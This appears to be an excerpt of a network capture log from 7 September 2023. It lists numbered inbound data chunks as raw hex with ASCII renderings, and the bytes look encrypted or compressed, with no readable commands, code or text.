2023-09-07 07:31:08 UTC	349	IN	Data Raw: 27 79 5a 32 8b 37 84 36 08 b1 22 51 8c 5f 8c 4b 11 b1 35 2e 0f a6 5a 00 82 0f 52 3b b9 e1 39 66 00 a0 6a 11 20 13 0b 13 19 00 ee 88 52 e7 7c 93 eb be 2a 1e 56 fa 5d 1c 7a fc 80 bb 0f 58 ef 65 73 7c e2 f2 37 51 70 25 62 15 be 9d b3 bf fa 19 05 9e a5 7b b2 f7 b6 7b c2 01 f0 66 ce 54 12 a3 9c f9 c8 9c 7e bb 9a bb 9c a3 18 90 e9 2f ba e3 c1 92 87 e0 aa 28 74 75 41 89 60 7f 8d b3 35 8e 17 9c 5e a0 44 aa e5 de b3 90 dc 64 8f 2d 11 16 68 8f ee 9d e5 0b 6e 7e 1d ff 77 a3 a2 31 f2 cb fa 3b c5 41 85 40 05 0e 49 f5 ee 18 d3 4f 67 b0 c4 98 44 c2 6e 00 fe bc 13 d2 43 51 3d 6e 5d 2d ba 5e 23 5e 90 54 3e b1 7e d3 16 2d 70 2d a8 c0 6b 38 b1 13 47 35 e6 9f ec 86 07 2d 3e 7c 52 00 ab f3 ed 99 94 f4 d0 9d 95 05 79 52 74 69 e1 93 36 2a 82 b0 d1 39 43 fe 2a bb 7f 1b bd 20 40 Data Ascii: 'yZ276"Q_K5.ZR;9fj R\|V]zXes\|7Qp%b{{fT~/(tuA`5^Dd-hn~w1;A@IOgDnCQ=n]-^#^T>~-p-k8G5->\|RyRti69C* @
2023-09-07 07:31:08 UTC	350	IN	Data Raw: fd 37 f6 37 c3 03 e0 30 4e 76 0c ec c0 72 f4 63 cd ef 46 56 12 48 83 27 79 ad a6 10 8c e8 e8 bc 70 69 4f 0a 34 2b 5e 21 a3 f9 fe 44 f5 f4 08 3c 7d 31 22 42 78 2a cc 83 a9 da 69 49 14 b8 4b 93 55 b5 9d da 86 9c a1 47 e2 1e 75 47 e5 7f a0 93 59 d9 75 05 98 df 6d ac 69 8f 3d 97 8b a8 ca d0 ff 53 9a a0 28 a0 5e d0 72 86 75 88 0c 6e 86 13 b4 e5 10 76 00 14 6e fa 47 d6 87 92 74 be 95 03 eb 89 98 b9 31 fc 66 06 d9 8f 63 fc 95 34 df 2c ce ec ba ee 2b e4 97 fb 10 d3 e2 ae bc ec ad 8e 26 35 0f ea 45 4c e8 93 cf 67 f8 36 40 0b b9 a7 40 41 8e 1f f7 14 ec a5 d7 92 f3 bc f4 c0 5c 59 91 11 92 ee 43 c9 d6 40 33 7a 37 29 45 ef ab f0 81 db 26 cb 94 bd f6 69 f9 b8 fb bd da 4d 3b 95 16 9d 71 f6 9a 26 c3 0f ef 27 3f ce 45 1f 0a 6e 4d 14 3b c5 de 75 76 26 32 27 51 1f 9d 0e b4 Data Ascii: 770NvrcFVH'ypiO4+^!D<}1"Bx*iIKUGuGYumi=S(^runvnGt1fc4,+&5ELg6@@A\YC@3z7)E&iM;q&'?EnM;uv&2'Q
2023-09-07 07:31:08 UTC	351	IN	Data Raw: 48 e2 3f 3a 08 11 e2 ab 30 6e 15 3d 06 43 c2 72 66 52 fa 9a 73 d9 b7 bf b0 f3 6f f9 18 c1 53 2b ee 90 4f 10 0b bc f5 bc 4c 83 5e 95 e9 64 60 04 64 08 50 3f 16 97 b3 3c 07 d8 66 48 70 ff 7a e1 7a 46 45 38 61 32 c2 0f a6 2e 00 a6 3c ea b2 e8 66 92 d2 92 04 e4 33 79 af c6 f8 2d 1d 1f 5c bf ab 61 01 ff 72 21 21 7d 13 de f3 f8 b0 57 ba 64 7c e1 f3 3e 09 6f 64 87 45 3a 04 5f 1a b5 8c 71 56 94 35 ab 0f 37 9d 74 17 c4 90 bc d8 73 4a 4b ae 41 d1 1b 34 b0 ef 29 8f 53 ad 54 59 a6 a4 a4 56 d1 2a 08 72 f6 0e 98 56 15 aa 77 ac f9 49 62 db 6b f1 fe 51 26 a9 e9 56 0d 7b c7 52 36 0c 1a 60 00 66 b7 1c e3 7f 98 1b aa 6a c5 cd 85 28 68 2b ee 68 37 c0 01 da b5 30 b1 51 88 25 a5 a0 51 53 89 2d ea 27 fe 3c e9 aa 19 86 e8 ee 59 d4 42 6d 2f 23 69 a4 5b 7e 39 fe 6c a8 22 e2 7d ac Data Ascii: H?:0n=CrfRsoS+OL^d`dP?<fHpzzFE8a2.<f3y-\ar!!}Wd\|>odE:_qV57tsJKA4)STYV*rVwIbkQ&V{R6`fj(h+h70Q%QS-'<YBm/#i[~9l"}
2023-09-07 07:31:08 UTC	352	IN	Data Raw: 83 dc 8a 96 f3 70 a6 e8 f9 28 76 16 9f 31 bf 0d 88 9a 52 55 56 8a ce 50 8f f9 0f aa 52 d8 f9 84 4e 6a b2 ee 3f a5 5d 59 0b 71 2e 1a 7c 15 02 c5 84 e6 18 ff ed ac 5d 5d ca 14 0c fd ff 47 8a 5b c9 82 bf 4a e3 f0 1d e3 4c 69 3f 05 54 1c c2 de 4b c0 eb 3e f3 ff 61 12 38 a2 62 e0 89 dd c9 12 72 5f 01 b0 57 e0 a4 97 6f e2 28 ac d1 6d 74 be 16 1c c6 88 c5 02 37 68 4c 59 e3 47 ea bf e9 c6 ac 0f 3e 0c 06 0b 23 04 e7 79 46 f7 f5 ea c6 c8 2e 38 12 cb 01 04 54 d1 20 9f e6 cb 2e 81 ec 08 21 ba 78 2c 6b 7b c3 94 6e 45 4d f0 3c 48 2e 92 2b 16 19 03 76 99 fc 04 10 b1 08 8d db c7 f9 7d bf e5 6b d2 70 41 9d 62 3e 76 06 63 78 2b 00 fc 54 2b 23 e3 1d 6f 23 e6 9e 0c 02 fc 1f 98 0f 67 f5 11 2c 6b fd 9e 57 49 8d c7 41 aa ab 4d b1 c3 c6 a6 86 30 b0 ab 5b 95 22 1e 2c 66 b2 e3 94 Data Ascii: p(v1RUVPRNj?]Yq.\|]]G[JLi?TK>a8br_Wo(mt7hLYG>#yF.8T .!x,k{nEM<H.+v}kpAb>vcx+T+#o#g,kWIAM0[",f
2023-09-07 07:31:08 UTC	353	IN	Data Raw: 0b 2f 62 6a fa 86 ad 8b 96 1e 6c c9 d5 7d 4f 2e c6 bc 01 d5 44 80 e4 42 df bf 92 5b 8b 43 a5 97 d9 bd 32 7d 15 af 14 d1 f5 83 d1 2c b4 34 58 ac 52 04 da 24 9e 86 31 f5 e0 1a 34 28 1c 46 6c ad 39 75 cd 41 4b a0 b9 1a 9a 71 0e 58 f3 59 b5 52 01 f0 f1 80 5c c0 b2 73 a9 72 44 20 d0 90 10 01 92 f4 fd dd 89 d1 f6 34 86 42 c3 cc 18 8d a7 1b 51 7d 87 f7 f1 ba 6d f5 2a e6 0d ef b0 c8 96 39 ed 1c bf 88 f0 38 c5 e7 b7 14 07 8a b6 ca a7 c8 b4 a8 0c ea af 9b 02 cc 8b 57 16 94 c7 aa 6c 3a f1 37 62 f7 96 70 ce c9 cf b6 f2 ab e0 f2 c4 45 58 cc e1 f7 c5 37 54 0a 47 ce 60 5b 44 39 fe e7 b8 9f 9b 98 e9 0c 15 18 57 fa ec 88 4c d5 66 c8 46 ef f6 ff b9 65 3c c4 cc 4d e9 fb dd f7 7b 84 e0 7b 63 0f 90 bb 9f 18 30 ef 32 c5 e6 a4 a2 42 05 f7 9a 16 91 9e 83 31 75 21 3a 84 28 3b 34 Data Ascii: /bjl}O.DB[C2},4XR$14(Fl9uAKqXYR\srD 4BQ}m*98Wl:7bpEX7TG`[D9WLfFe<M{{c02B1u!:(;4
2023-09-07 07:31:08 UTC	355	IN	Data Raw: d9 3c 39 2b dd c0 71 75 f1 f5 e8 98 ef c4 3a 21 8a 89 d5 c0 da ae 61 ef fd 4b 92 4b 6a ba 62 30 59 87 86 f5 59 9b 41 1f fb 4d 00 ae 77 4c 96 49 75 44 fc 13 03 fe f7 fa 03 64 c1 3a a1 7b 54 05 01 f1 a6 1c 2d 2f 82 28 f0 bd f4 30 72 e6 21 69 71 1f 73 79 3c d3 16 d8 f0 27 9c 05 8b f5 10 57 37 75 1a be 75 c0 d5 7c c7 b5 91 36 f3 af ae 0b 25 7b 5a 30 89 35 84 34 0a b3 22 53 8e 5d 8c 49 13 b3 35 2c 0d a4 5a 02 80 0d 52 39 bb e3 39 64 02 a2 6a 13 22 11 0b 11 1b 02 ee 8a 50 e5 7c 91 e9 bc 2a 1c 54 f8 5d 1e 78 fe 80 3c 9c 55 ef a2 ab 6e e2 a0 6e 58 70 27 60 17 be 9f b1 bd fa 1b 07 9c a5 79 b0 f5 b6 79 c0 03 f0 64 cc 56 12 a1 9e fb c8 9e 7c b9 9a b7 8e b3 18 84 f3 31 ba d2 f5 a9 87 1d 57 d5 74 88 bc 74 60 82 70 4e 95 73 ea 61 a1 5d b9 57 1a 20 4d 6e 23 ba 51 f3 ee Data Ascii: <9+qu:!aKKjb0YYAMwLIuDd:{T-/(0r!iqsy<'W7uu\|6%{Z054"S]I5,ZR99dj"P\|*T]x<UnnXp'`yydV\|1Wtt`pNsa]W Mn#Q
2023-09-07 07:31:08 UTC	356	IN	Data Raw: 02 c7 16 56 e5 22 17 12 a5 d0 bd 91 d3 27 4e 81 71 7c 3e f6 64 a9 27 c6 5a 8d d6 54 82 d0 7f b7 a6 5f 73 d4 06 6f 19 d5 ab ec 29 2b 2e 23 b2 73 7a cb af ec 5d 57 66 24 b6 a6 b9 ba 27 24 ab 73 c5 0d fc c6 a2 6b a0 81 22 b5 85 42 79 c4 13 ff 54 03 58 c5 34 38 32 06 52 22 1b fb 51 ea c2 cc 3e 41 fe de 39 9d 94 42 61 8f 97 b2 d2 c5 59 11 e2 30 f6 34 c7 07 e0 33 4a 72 0c ef c4 76 f4 60 c9 eb 46 55 16 4c 83 24 7d a9 a6 13 88 ec e8 bf 74 6d 4f 09 30 2f 5e 22 a7 fd fe 47 f1 f0 08 3f 79 35 22 41 7c 2e cc 80 ad de 69 4a 10 bc 4b 90 51 b1 9d d9 82 98 a1 44 e6 1a 75 44 e1 7b a0 90 5d dd 75 06 9c db 6d af 6d 8b 3d 19 15 bc ca 52 71 54 9a 24 a0 ab 5e da 7b 82 75 8b 08 6a 86 0c ae e2 10 de bd 1f 6e fc 45 d3 87 91 70 ba 95 00 ef 8d 98 b3 3f f3 66 0b d2 9a 63 d3 bf 00 df Data Ascii: V"'Nq\|>d'ZT_so)+.#sz]Wf$'$sk"ByTX482R"Q>A9BaY043Jrv`FUL$}tmO0/^"G?y5"A\|.iJKQDuD{]umm=RqT$^{ujnEp?fc
2023-09-07 07:31:08 UTC	357	IN	Data Raw: 67 af b6 77 3e b9 55 51 b4 49 3c 3c 5f 7e cf 4a 52 a3 6a d8 e7 d4 99 48 1a 6c 5c 98 13 88 23 20 0d 26 1d 56 6f af 24 b2 88 58 8b 83 91 8f f2 53 bb 93 38 76 ac ce df f4 02 73 f8 d4 9b eb 63 bb 71 e6 c8 7f 97 7c 4d b4 26 99 e2 7b ba 4c f7 f8 c7 f7 3e 40 34 0b 5d cc 6b d2 9d 99 0b 47 91 75 50 37 9c 1c 3a 5b e3 b1 d0 a6 f4 52 eb bc 62 c6 b7 ed 3f c5 f7 1e e2 54 cf 61 15 c2 f9 4c c2 8d 99 5d fa 65 8c d6 b7 40 4f fc 6f 06 e7 ce 53 db 00 9d 4f e8 fc b2 f5 51 a0 8e 5e c4 aa 64 60 55 27 08 50 f4 d1 9d b3 f1 ce d2 66 f3 c5 f6 7a 4f dd 4e 45 a7 f6 34 c2 81 22 2b 00 de 51 e9 b2 84 06 90 d2 f1 51 e5 33 0a c8 c4 f8 a4 62 1b 5c 1c 30 66 01 5c e9 26 21 3a 69 dd f3 9d d3 4e ba 68 71 f1 f3 38 0e 67 64 81 42 32 04 59 1d bd 8c 77 51 9c 35 ad 08 3f 9d 72 10 cc 90 ba df 7b 4a Data Ascii: gw>UQI<<_~JRjHl\# &Vo$XS8vscq\|M&{L>@4]kGuP7:[Rb?TaL]e@OoSOQ^d`U'PfzONE4"+QQ3b\0f\&!:iNhq8gdB2YwQ5?r{J
2023-09-07 07:31:08 UTC	358	IN	Data Raw: 4f 93 e7 c5 1b 3e 3a 13 50 0e bd f0 03 69 e9 64 6a 70 ce 80 d5 c9 7b dd cf c7 01 89 a2 73 90 a6 8e 84 b9 87 f1 d2 9a b7 d0 90 04 9c 28 6f 0c a6 da 05 38 75 b4 b3 05 20 df e8 c4 fd 5c 3a 52 e6 b9 00 e5 e3 e3 15 aa 5a a8 df 35 2a 27 5a 6a f4 d9 7e e6 f7 42 da 3d 55 bc c7 26 b7 52 50 54 4c 29 48 2f af 6d 35 57 fe 0b 3c 8c 4f 6b 7f 68 18 83 dc 8a 96 f3 70 f9 e8 f9 28 89 16 9f 31 40 d6 52 40 72 ae ac 73 ce ac 74 44 0f 55 ad 9a f9 69 a3 56 b2 34 e5 92 5d 83 d1 46 2e 48 2e 00 02 f2 b3 e8 18 25 37 9b 5d 9c 0b 25 0c fd ff 47 8a d4 46 a6 bf 2a 83 e8 1d ca 65 62 3f df 8e 2b c2 04 91 f7 eb b3 7e dc 61 0e 26 a1 62 e5 fc e3 c9 d5 a7 48 01 a6 41 e9 a4 03 fb c4 28 38 45 4b 74 1c b4 36 c6 52 1f 35 37 3d 0d 63 e3 d9 8a 8e e9 39 53 4d 3e 90 98 3e 23 1f f9 5b 46 e0 ef f4 c6 Data Ascii: O>:Pidjp{s(o8u \:RZ5'Zj~B=U&RPTL)H/m5W<Okhp(1@R@rstDUiV4]F.H.%7]%GFeb?+~a&bHA(8EKt6R57=c9SM>>#[F
2023-09-07 07:31:08 UTC	360	IN	Data Raw: 41 4a 8a 28 e0 5e 80 c3 fd dc 71 17 9c cb 5f 23 cc 5c 21 5f 7a 3b 9b 63 c6 f6 e9 87 62 04 62 0a e6 84 81 f2 12 9d 5c 4d dc 18 34 15 d6 2f be 6a ad ef f1 a6 18 04 e7 3c a2 8d 4f 2b 75 f1 3d 81 ed eb 43 fc 3f 56 63 19 4b 48 39 bc 56 36 53 8e 56 2b b1 6e c1 03 2d 60 3f bd c0 7b 2a a4 13 57 27 f3 9f eb 81 0f 2d 3e 7c 52 00 8a d2 cc 99 6b 0b 2f 9d 6a fa 86 52 8b 96 1e 33 c9 d5 7d 4f 2e c6 bc 01 d5 44 80 e4 42 df bf 92 5b 8b 43 a5 97 d9 bd 6d 7d 15 af eb d1 f5 83 2e f1 69 e8 78 51 af f8 da d9 63 49 31 0b 1e 6f 34 d6 e2 33 6c 53 c7 00 cd bf b5 d5 b9 e4 64 04 0e a6 0d 2c b5 ac ff 85 f1 7e a2 b5 b2 8d 57 07 44 de 2e e5 10 ff 6c 81 fd 23 77 a4 f6 ca 78 37 c3 32 e6 f8 a7 e5 af 08 87 09 0f cf 6d 0b d4 93 0d 11 4e bd 96 c7 13 69 bf 7e 05 4e c5 b4 f3 6f 07 e8 e2 b0 a7 Data Ascii: AJ(^q_#\!_z;cbb\M4/j<O+u=C?VcKH9V6SV+n-`?{*W'->\|Rk/jR3}O.DB[Cm}.ixQcI1o43lSd,~WD.l#wx72mNi~No
2023-09-07 07:31:08 UTC	361	IN	Data Raw: 06 4f ff 5b ca a6 92 6e a3 b4 03 f1 94 b9 b0 21 ea 47 08 cc 83 42 d0 a1 19 fe d3 2b 0e 9b 11 ce 06 b6 04 f5 31 63 51 59 0e 73 71 c3 d7 d1 15 a0 ae 36 6c 2a 85 26 c9 a5 e9 67 58 a5 a3 50 e0 12 f6 32 5a 32 70 2d 43 11 22 82 a6 74 f3 4c 11 a6 2b 08 bf d6 98 e9 d6 a0 0d 2a 0f 64 39 07 34 71 5f d7 42 cf 8b da b1 ce 40 1a 9d 05 8a 50 f6 80 3b e2 39 ce 3f 1e 71 90 13 2b 48 74 05 23 c5 de 75 76 2a 3f 25 51 9e 65 77 c1 6d 4b 6a ba 9d 30 59 87 79 f5 59 9b 64 1f fb 4d 00 ae 77 4c 96 49 75 44 fc 13 03 fe f7 fa 03 64 c1 3a a1 7b 0b 05 01 f1 59 1c 2d 2f 7d f6 2e 63 0b ce 8c 18 de 94 8c e2 8c 84 c1 2e e9 25 0d da 63 f8 76 08 3b aa ca 88 1a 58 93 26 d5 73 c8 ba 91 34 f1 ad ae 08 26 78 5a 3c 84 25 84 23 1f aa 22 44 94 44 8c 5e 09 aa 35 3b 17 bd 5a 15 9a 14 52 2e a1 fa 39 Data Ascii: O[n!GB+1cQYsq6l&gXP2Z2p-C"tL+d94q_B@P;9?q+Ht#uv*?%QewmKj0YyYdMwLIuDd:{Y-/}.c.%cv;X&s4&xZ<%#"DD^5;ZR.9
2023-09-07 07:31:08 UTC	362	IN	Data Raw: 90 9b 87 ba c5 fb 5f e5 4a 73 71 a9 6b ca ab f0 c8 62 74 e8 3b 6f bc 27 8c b5 4b 51 be 2e 1b cb 4f 10 29 70 ac 52 54 a6 59 5b a1 af 29 d5 00 84 03 f1 bf 81 c3 55 88 ac f9 b6 9d db 6b 0e 01 51 26 f6 16 56 0d 7b 38 52 36 0c e5 60 00 66 48 1c e3 7f 67 1b aa 6a 3a cd 85 28 97 2b ee 68 c8 c0 01 da 4a 30 b1 51 77 25 a5 a0 ae 53 89 2d 15 27 fe 3c 16 aa 19 d9 17 ee 59 2b bd 6d 2f dc 4e 7c 8c 81 3e 09 9a 57 27 18 84 53 d6 54 82 d0 7f b7 a6 5f 73 d4 06 6f b9 d5 ab ec d6 2b 2e 23 4b 73 7a cb 27 ec 5d 57 60 24 b6 a6 b9 ba 27 24 ab 73 c5 0d fc c6 a2 6b a0 81 22 b5 85 42 79 c4 13 ff 54 03 58 c5 34 38 32 06 52 22 44 fb 51 ea 3d cc 3e 41 01 00 e7 43 6b bd 9e 70 68 4f 2f 38 a6 ed 19 cb 09 c8 3c fc 1f cf b1 89 f3 13 3f 8d 0b 9c 32 10 b9 a9 ed b7 7c d8 86 52 41 ef 73 17 67 Data Ascii: _Jsqkbt;o'KQ.O)pRTY[)UkQ&V{8R6`fHgj:(+hJ0Qw%S-'<Y+m/N\|>W'ST_so+.#Ksz']W`$'$sk"ByTX482R"DQ=>ACkphO/8<?2\|RAsg
2023-09-07 07:31:08 UTC	363	IN	Data Raw: fd c8 e6 28 ab 1c 3c 91 4b 16 c7 53 f0 c1 0c f9 f4 dc 05 18 86 b9 f6 0a 15 39 c8 d1 c7 ed ca fe fb ab d0 df 60 19 cb d1 7e 13 09 de 45 87 2d 94 84 3c 94 91 ba b2 f1 c3 b7 d1 93 d4 e9 e6 03 89 66 03 05 ef 4e f7 8f 20 3c 06 79 45 1c 94 f7 aa 9b 62 9d 3e 76 f9 9d 78 2b ff 02 54 2b 7c 1c 1d 6f 23 18 9e 0c 02 02 1f 98 0f 98 f5 11 2c 96 fd 9e 57 eb 8d c7 41 a0 ab 4d b1 c3 c6 a6 86 30 b0 ab 5b 95 22 1e 2c 66 b2 e3 94 a3 62 ea 70 dc da f4 de e2 ac 96 57 db 48 71 a0 74 7e 6d 73 0d ac 44 6c c7 a8 72 10 20 f4 02 73 a9 d4 9b eb 62 a0 6b fc 69 f4 1e f9 b2 72 e5 27 1c b5 71 89 08 36 0c 32 c0 8e ff ce a3 02 a0 17 63 57 c0 82 6e bb 9b f2 62 d2 f1 9e c2 7f 1b 63 f4 9c 20 20 63 08 7c d8 3e 0b 3c 2b e2 9a 04 54 14 0c 32 79 c3 43 52 68 fa ab 47 e3 b6 8e 84 c9 6e c8 2c fb 53 Data Ascii: (<KS9`~E-<fN <yEb>vx+T+\|o#,WAM0[",fbpWHqt~msDlr sbkir'q62cWnbc c\|><+T2yCRhGn,S
2023-09-07 07:31:08 UTC	364	IN	Data Raw: ba 6c f5 2b e7 0d ee bf d9 84 39 ff 0b a6 80 21 e1 19 4b f3 e4 f8 1e e2 3b 58 bd db 5b f3 64 2b 6f fd 32 75 a9 e9 6a 39 54 93 c4 0f c9 9d 09 68 8e 31 37 31 48 0d 55 1e 0c 3b bb a6 32 1e 06 3b c9 ab 02 9c 14 bb 5a 54 2b e8 e7 b5 90 8b 98 e8 0d 15 19 57 fa ed 88 4d d4 66 c9 46 ef f7 ff b9 65 3d c7 cf 4f e8 f8 df f4 7b a6 c3 59 62 f1 6e 45 9e e6 cf 10 32 3a 18 5a 03 bc fb 09 64 e8 6e 61 7c ce 8b df c4 7a d6 c5 ca 00 83 a9 7f 90 ad 84 89 b8 8c fb df 9b bd db 9c 04 97 22 62 0d ad d0 08 39 7f bf bf 05 2b d5 e5 c5 f7 57 36 52 ed b3 0d e4 cc c0 1d ab 0a f7 d2 35 27 29 58 6b d4 f9 5e e7 08 bd 25 3d a6 4d 28 27 59 be b9 f5 69 0d 6c d0 af 6d 35 a1 fe 0b 3c 83 4f 6b 7f 68 18 83 dc 8a 96 f3 70 f9 e8 f9 28 89 16 9f 31 40 d6 52 40 ad ae ac 73 31 ac 74 02 f0 55 ad 27 09 Data Ascii: l+9!K;X[d+o2uj9Th171HU;2;ZT+WMfFe=O{YbnE2:Zdna\|z"b9+W6R5')Xk^%=M('Yilm5<Okhp(1@R@s1tU'
2023-09-07 07:31:08 UTC	366	IN	Data Raw: 36 85 37 08 b1 22 51 8d 5e 8d 4a 33 95 36 2f b8 60 4a 00 d8 6d 5a 3a a2 fc 3a 67 21 84 69 11 02 37 08 12 3b 24 ed 89 44 ff 7e 93 e7 b3 2b 1f 53 ff 5c 1d 6e ea 82 bb b7 90 ff 64 54 57 e6 f3 37 51 70 25 63 14 bf 9c b3 bf fa 19 04 9f a4 7a b3 f6 b7 7a c2 01 f0 66 cf 55 13 a2 9d f8 c9 9d 7e bb 9a b5 8a b7 1f 87 f9 3b b3 d1 2e 72 5e 1f aa 28 8b 83 41 89 9f 70 8d b3 6a 8e 17 9c 5e a0 44 aa e5 de b3 90 dc 64 8f 2d 11 16 68 8f ee 9d e5 0b 6e 7e 1d ff 77 a3 a2 31 f2 c4 fa 3b c5 b6 a3 66 23 f1 b0 0d 19 e7 29 b5 9e 4f 3b 67 e4 3d 91 ff fe 43 ec 2d 43 63 09 59 5d 39 ac 44 23 53 9e 44 3e b1 7e d3 16 2d 70 2d a8 c0 6b 38 b1 13 58 14 e5 9f 55 4f 17 2d 70 29 55 00 ab f3 ed 99 94 f4 d0 9d 95 05 79 52 74 69 e1 93 36 2a 82 b0 d1 39 43 fe a9 35 73 1b e3 46 49 6d a4 74 bc 5a Data Ascii: 67"Q^J36/`JmZ::g!i7;$D~+S\ndTW7Qp%czzfU~;.r^(Apj^Dd-hn~w1;f#)O;g=C-CcY]9D#SD>~-p-k8XUO-p)UyRti6*9C5sFImtZ
2023-09-07 07:31:08 UTC	367	IN	Data Raw: 00 e3 31 4d 72 08 ed 18 aa 2c 63 32 10 b9 5f ed b7 7c d7 86 52 59 ef 73 17 17 43 8f 96 b0 f5 cb d4 a1 de 5c 06 01 bb 0a 0b f7 c3 82 ce dd bd 87 d5 33 7c 56 25 96 b9 eb 47 b4 9b 8d 6d 45 da 84 9e a2 47 e0 1c 76 47 e4 7e a1 93 58 d8 74 05 99 de 6c ac 68 8e 3c b3 ad ad cb 7d 42 5d 9b 30 b4 ac 5f c2 60 85 74 88 0d 6f 87 0f ab e7 11 dd b8 1a 6f ff 40 d6 86 92 75 bf 94 03 ea 88 99 b0 3d f1 64 08 75 2f 6c d0 3e 94 d3 d3 b9 80 b6 11 d5 1a 96 04 ee 2d 43 51 42 12 53 71 d8 cb f1 15 bb b2 16 6c 31 99 06 c9 be f5 47 58 be bf 70 e0 09 ea 12 5a 29 6c 0d 43 0a 3e a2 a6 6f ef 6c 11 be 34 2a bf ce 87 cb d6 62 c8 d3 0f 81 db d9 3c 94 bd 09 b2 2a 69 04 4e 2b a2 c4 62 e0 68 8e 09 65 d9 3c c6 2b dd c0 8e 75 f1 f5 b7 98 ef c4 3a 21 8a 89 d5 c0 da ae 6e ef fd 4b 64 6c 4d 9d 9d Data Ascii: 1Mr,c2_\|RYsC\3\|V%GmEGvG~Xtlh<}B]0_`too@u=du/l>-CQBSql1GXpZ)lC>ol4b<iN+bhe<+u:!nKdlM
2023-09-07 07:31:08 UTC	368	IN	Data Raw: 12 e1 ab 33 6d 16 3d 04 40 c1 72 65 51 f9 9a 70 da b4 bf b2 f0 6c f9 1b c2 50 24 fc 91 4c 17 01 be f6 ae 5b 84 5a 3b f6 da 6f aa ff 2c 56 0b 0d b5 b5 0e 32 de 65 0c 38 fa 79 b0 21 42 46 58 0b 38 c1 7e de 27 03 21 ad e5 b1 7b fb 9c d1 0e ad e9 30 f5 34 c8 fb 5b 9f 17 5f e3 cd 6b 03 a3 17 28 20 ad 29 14 2b 92 3c a2 45 6c 83 1e 0c ce f6 90 9b 78 ba c5 fb a0 e5 4a 73 8e a9 6b ca 54 f0 c8 62 8b e8 3b 6f 43 27 8c b5 b4 51 be 2e e4 cb 4f 10 d9 70 ac 52 5d 81 7e 7c a1 51 d7 2b 01 7a fd 0c be 7d 3f ae 88 57 02 4d 9c 27 97 f5 01 aa dd 0d 17 ad f6 80 39 a9 cd f7 e4 9c fc 9d 48 e7 18 84 66 e0 51 91 3b 31 79 d3 97 d0 15 93 c9 3b fa 21 4b cc 4d aa 77 de 5e 5b af a8 72 d6 14 db 02 c7 16 51 e2 22 16 82 39 da bc 81 c4 26 4e a9 5d 79 3f f2 61 ac 26 e4 78 a8 d6 af 79 2b 7e Data Ascii: 3m=@reQplP$L[Z;o,V2e8y!BFX8~'!{04[_k( )+<ElxJskTb;oC'Q.OpR]~\|Q+z}?WM'9HfQ;1y;!KMw^[rQ"9&N]y?a&xy+~
2023-09-07 07:31:08 UTC	369	IN	Data Raw: 57 de 17 f9 28 89 e0 9f 31 40 d9 52 40 ad ae ac 73 31 ac 74 02 f0 55 ad 27 06 7b b1 95 4d 11 c0 5a a2 c1 f4 8e d1 1b 83 ea 8f c5 7b 19 30 fe 12 53 75 5c 32 ec 2b fd ee 56 89 5a 1b 50 9f 4b 12 01 38 e3 b3 96 17 04 c0 88 d5 de 77 fc e1 3f 60 6c 78 0f 16 91 6b 5d c4 4d dd b5 13 84 20 bb 78 c4 a2 96 90 1d 00 ac 2e 92 5c bf e9 e3 ee 89 3a fd 1f e7 28 ab cb 3c dd 00 cd c7 b9 18 27 0c 0b 05 33 05 ef 70 4d f6 fd e3 cd c8 26 31 19 ca 09 0d 5f d0 28 96 ed cb 26 88 e7 09 29 b3 73 2c 63 72 c8 95 66 4c 46 f1 34 41 25 92 23 1f 12 02 7e 90 f7 05 18 b8 03 8e dc c0 fa 78 bb e2 6a f7 8d bc 45 9d 3e 76 f9 95 78 2b ff f3 54 2b 7c e3 1d 6f 23 e6 9e 0c 02 fc 1f Data Ascii: W(1@R@s1tU'{MZ{0Su\2+VZPK8w?`lxk]M x.\:(<'3pM&1_(&)s,crfLF4A%#~xjE>vx+T+\|o#
2023-09-07 07:31:08 UTC	370	IN	Data Raw: 98 0f 67 f5 11 2c 6b fd 9e 57 2e 8d c7 41 55 ab 4d da 3c c6 a6 4c cf b5 ae 90 6a 2e 12 e1 99 5d 0c 6f 5c b5 3d 85 23 3f 11 27 1d f2 c8 89 24 26 1f 41 8b e3 f0 99 f2 a9 41 a7 38 93 49 c6 df 10 e6 8a f8 fb b4 3f 63 4f 85 1a 68 cc 24 8c b2 07 95 69 1d 63 a2 83 08 fd c2 3c c1 41 35 c1 a2 87 21 03 62 7e ee a6 6e 85 bf da 63 e9 ce a8 c3 44 24 55 f4 a7 1f 16 62 33 43 ee 3f 30 03 1d e2 a1 3b 62 15 37 0d 4f c2 78 6d 5e fa 90 78 d5 b7 b5 bb ff 6f f3 13 cd 53 2e f4 9e 4f 1d 08 b1 f5 ad 5c 85 5e 3b 55 6b 60 72 00 df 50 f4 d1 6d bb f1 ce 22 96 f3 c5 06 85 4f dd be ba a7 f6 c4 3d 81 22 db ff de 51 19 4d 84 06 60 4a f1 51 15 32 0a c8 57 f8 a1 67 56 5d 34 18 51 00 72 c7 1f 21 a3 ff c8 f2 58 09 68 bb e9 f1 c4 f3 0b 3c 61 65 fa 38 1b 04 0b 4e a3 8d a6 81 ac 34 26 82 13 9c Data Ascii: g,kW.AUM<Lj.]o\=#?'$&AA8I?cOh$ic<A5!b~ncD$Ub3C?0;b7Oxm^xoS.O\^;Uk`rPm"O="QM`JQ2WgV]4Qr!Xh<ae8N4&
2023-09-07 07:31:08 UTC	371	IN	Data Raw: ec 60 a6 d4 40 78 f0 79 5c 84 e7 d9 08 29 3a 0f 43 19 bd ec 10 7e e9 78 79 67 ce 9c c6 de 7b c1 dc d0 01 95 b1 64 90 ba 9d 93 b9 9b e2 c5 9a ab c3 87 04 80 3b 78 0c ba c9 12 38 79 b8 b7 05 2a d4 e4 c4 2f 8f ee 52 13 4d f3 ed 16 17 e6 5a a1 53 25 ca d5 d8 a5 95 2a 07 a0 19 f7 42 da c2 55 bc c7 d9 b7 52 50 46 4c 29 48 90 af 6d 35 e8 fe 0b 3c 33 4f 6b 7f 91 0d 96 c9 75 6d 08 8b 07 13 02 d3 77 f1 7b d1 bf 31 b6 a0 53 49 48 93 ce 4b 90 e2 0e b2 49 c7 f8 9c 55 75 b3 f6 24 ba 5d 41 10 6e 2f 02 67 0a 03 dd 9f f9 18 e7 f6 b3 5c 45 d1 0b 0d e5 e4 58 8a 43 d2 9d be 52 f8 ef 1c fb 57 76 3f 1d 4f 03 c3 c6 50 df ea 26 e8 e0 61 16 3d be 63 44 5e d3 c8 ad dc 4f 01 a2 46 fe a5 8f 74 fd 28 b4 ca 72 75 a6 0d 03 c7 90 de 1d 37 ff cc 4b e2 25 75 ab e8 de b7 10 3e 08 02 0f 22 Data Ascii: 